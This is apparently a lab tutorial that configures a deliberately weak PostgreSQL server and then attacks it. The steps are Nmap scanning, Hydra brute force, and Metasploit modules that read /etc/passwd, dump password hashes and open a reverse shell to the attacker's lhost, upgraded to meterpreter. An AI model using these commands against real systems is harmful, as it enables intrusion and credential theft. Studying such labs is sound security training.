In this post, we will demonstrate how to set-up our own Vulnerable PostgreSQL for penetration testing on Ubuntu 20.04 and How to conduct PostgreSQL penetration testing.

Table of Content

Pre-requisites

PostgreSQL Setup on Ubuntu 20.04

PostgreSQL Penetration Testing

Scanning: Nmap

Brute force: Hydra

Access Postgres Shell

Exploiting: Metasploit

• Module 1: Postgres Readfile
• Module 2: Banner Grabbing for Postgres_sql
• Module 3: Dumping Password Hashes
• Module 4: Pwn Postgres Shell

Pre-requisites:

Target:  Ubuntu

Attacker: Kali Linux

PostgreSQL Setup on Ubuntu 20.04

PostgreSQL is an open-source and advanced object-oriented relational database which is also known as Postgres. It is a powerful high-performance database management system released under a flexible BSD-style license.

In order to configure PostgreSQL in your Ubuntu platform, there are some prerequisites required for installation.

• Ubuntu 20.04
• Root Privileges

Install PostgreSQL and All Dependencies

PostgreSQL is available in the Ubuntu repository. So you just need to install them with the apt command.

apt install postgresql postgresql-client

on the time of installation, a prompt will display on your system that will ask you to confirm the installation process that either you want to continue or not. You need to press ‘y’ to continue the installation.

Once the installation is completed, start the PostgreSQL service and add it to the system boot by entering following command

systemctl start postgresql.service
systemctl enable postgresql.service

Set PostgreSQL user Password

You can create the user password for PostgreSQL. Using the following command, you can change the default user password for PostgreSQL. During this process a prompt display on your system that will ask you to enter the new password. After that, a confirmation will be displayed ‘password updated successfully’. And then next, Now you will log in to the database as a user or working shell using the following command:

passwd postgres
su -l postgres
psql

Create a database and user roles

You can create new databases and users using the PostgreSQL shell as follows:

psql -c "alter user postgres with password '123' "
createuser -EPd ignite
createdb secret -O ignite
psql secret

Enter the following command to list the databases:

psql -l

PostgreSQL by default listens at Local Interface which is 127.0.0.1. But, for the remote access, you need to some changes in the configuration file. To Access the configuration file you will use the following command:

nano /etc/postgresql/12/main/postgresql.conf

under the connection settings, you will set #listen_addresses= ‘*’

Now you will restart the PostgreSQL service by entering the following command

service postgresql restart

Let’s start Pentesting PostgreSQL

In this section, you will be learning how to compromise Databases credentials using different techniques.

Let’s fire up the Attacking machine kali-Linux

Nmap

By-default PostgreSQL service is running on the port no. 5432, with the help of NMAP, let’s identify the state of Port.

nmap -p5432 192.168.1.108

As you can see, it has shown Open state for PostgreSQL at port 5432.

Password Cracking

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Let’s brute-force the target perform this attack you should go with the following command where -L option enables dictionary for username parameter and -P options enables dictionary for the password list.

hydra -L user.txt -P pass.txt 192.168.1.108 postgres

As above you can see we have successfully dumped the credentials you can use these credentials in gaining access on the database.

Connect to Database Remotely

Kali Linux by default have the psql utility which allows you to authenticate with PostgreSQL database if the username and the password are already known.

As we have already right credentials of the database

 psql -h 192.168.1.108 -U postgres

Metasploit

As we know Metasploit comes preinstalled with Kali Linux, so our first step is to get to the Metasploit console.

Module 1: Postgres Readfile

The postgres_readfile module, when provided with credentials (e.g. superuser account) for a PostgreSQL server, will read and display files of your choosing on the server.

msf > use auxiliary/admin/postgres/postgres_readfile
msf auxiliary(admin/postgres/postgres_readfile) > set rhosts 192.168.1.108
msf auxiliary(admin/postgres/postgres_readfile) > set rfile /etc/passwd
msf auxiliary(admin/postgres/postgres_readfile) > set password 123
msf auxiliary(admin/postgres/postgres_readfile) > exploit

Module 2: Banner Grabbing for Postgres_sql

The postgres_sql module, when provided with valid credentials for a PostgreSQL server, will perform queries of your choosing and return the results.

msf > use auxiliary/admin/postgres/postgres_sql
msf auxiliary(admin/postgres/postgres_sql) > set rhosts 192.168.1.108
msf auxiliary(admin/postgres/postgres_sql) > set username ignite
msf auxiliary(admin/postgres/postgres_sql) > set password 123
msf auxiliary(admin/postgres/postgres_sql) > exploit

Module 3: Dumping Password Hashes

As we have credentials of database admin then we use this one-liner exploit to dump all the user hashes in Metasploit:

msf use auxiliary/scanner/postgres/postgres_hashdump
msf auxiliary(scanner/postgres/postgres_hashdump) > set rhosts 192.168.1.108
msf auxiliary(scanner/postgres/postgres_hashdump) > set username postgres
msf auxiliary(scanner/postgres/postgres_hashdump) > set password 123
msf auxiliary(scanner/postgres/postgres_hashdump) > exploit

Module 4:  Pwn Postgres Shell

Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with ‘pg_execute_server_program’ to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access. This module attempts to create a new table, then execute system commands in the context of copying the command output into the table

msf > exploit/multi/postgres/postgres_copy_from_program_cmd_exec
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set rhosts 192.168.1.108
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set lhost 192.168.1.111
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set username postgres
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set password 123
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

Now we gained access on the database, you can observe that here we obtain command session and latter we have to upgrade it into meterpreter sessions.

msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions -u 1
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions 2

Now we have full access on the database, in this way we can test for postgres loopholes and submit the findings to the network admin 😊.

Author – Vijay is a Certified Ethical Hacker, Technical writer and Penetration Tester at Hacking Articles. Technology and Gadget freak. Contact Here